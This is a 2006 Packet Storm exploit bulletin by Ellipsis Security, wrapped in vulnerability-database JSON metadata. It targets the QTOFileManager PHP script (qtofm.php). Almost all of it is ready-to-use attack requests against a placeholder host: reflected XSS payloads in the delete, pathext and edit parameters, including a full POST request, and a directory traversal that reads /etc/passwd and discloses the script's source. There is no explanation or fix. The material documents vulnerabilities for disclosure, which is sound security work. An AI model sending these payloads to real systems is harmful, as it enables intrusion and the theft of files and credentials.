ID PACKETSTORM:48039
Type packetstorm
Reporter ellsec.org
Modified 2006-07-09T00:00:00
Description
`--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&u=[username]&pathext=1
http://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
http://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&edit=1
http://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
---
POST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 117
u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&newcontent=1&save=Save&savefile=1
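------------------------------------------------------
Directory Traversal / File Disclosure (edit parameter)
------------------------------------------------------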
http://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/passwd&u=[username]&pathext=
http://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext=
-----------------
Ellipsis Security
http://ellsec.org
`
{"hash": "d5ccc56166720a3cec7341b31042f29f9a53a0918d442a81774ffc85f1e155ca", "sourceHref": "https://packetstormsecurity.com/files/download/48039/QTOFileManager.txt", "title": "QTOFileManager.txt", "id": "PACKETSTORM:48039", "published": "2006-07-09T00:00:00", "description": "", "modified": "2006-07-09T00:00:00", "sourceData": "`-------------------------- \nCross Site Scripting (XSS) \n-------------------------- \nhttp://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&u=[username]&pathext=1 \nhttp://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script% \n \n3E \nhttp://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&edit=1 \nhttp://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E \n--- \nPOST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0 \nAccept: */* \nContent-Type: application/x-www-form-urlencoded \nHost: target.xx \nContent-Length: 117 \nu=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&newcontent=1&save=Save&savefile=1 \n-------- \nhttp://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/passwd&u=[username]&pathext= \nhttp://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext= \n----------------- \nEllipsis Security \nhttp://ellsec.org \n`\n", "reporter": "ellsec.org", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "2c70549dc1b3820ea6d4ead9e37e5562"}, {"key": "modified", "hash": "506c9e24ae2ddea054e86dc4fd6d6f07"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": 
"published", "hash": "506c9e24ae2ddea054e86dc4fd6d6f07"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "613a5a072d752f376bb723566d3bb672"}, {"key": "sourceData", "hash": "8003b7a104530258eb6d6a23bac521f4"}, {"key": "sourceHref", "hash": "b1ee8e8b6f258857f65b572e46488b3f"}, {"key": "title", "hash": "16e0dd622b3de71d7524939d198edb94"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/48039/QTOFileManager.txt.html", "lastseen": "2016-11-03T10:21:49", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}
{"result": {}}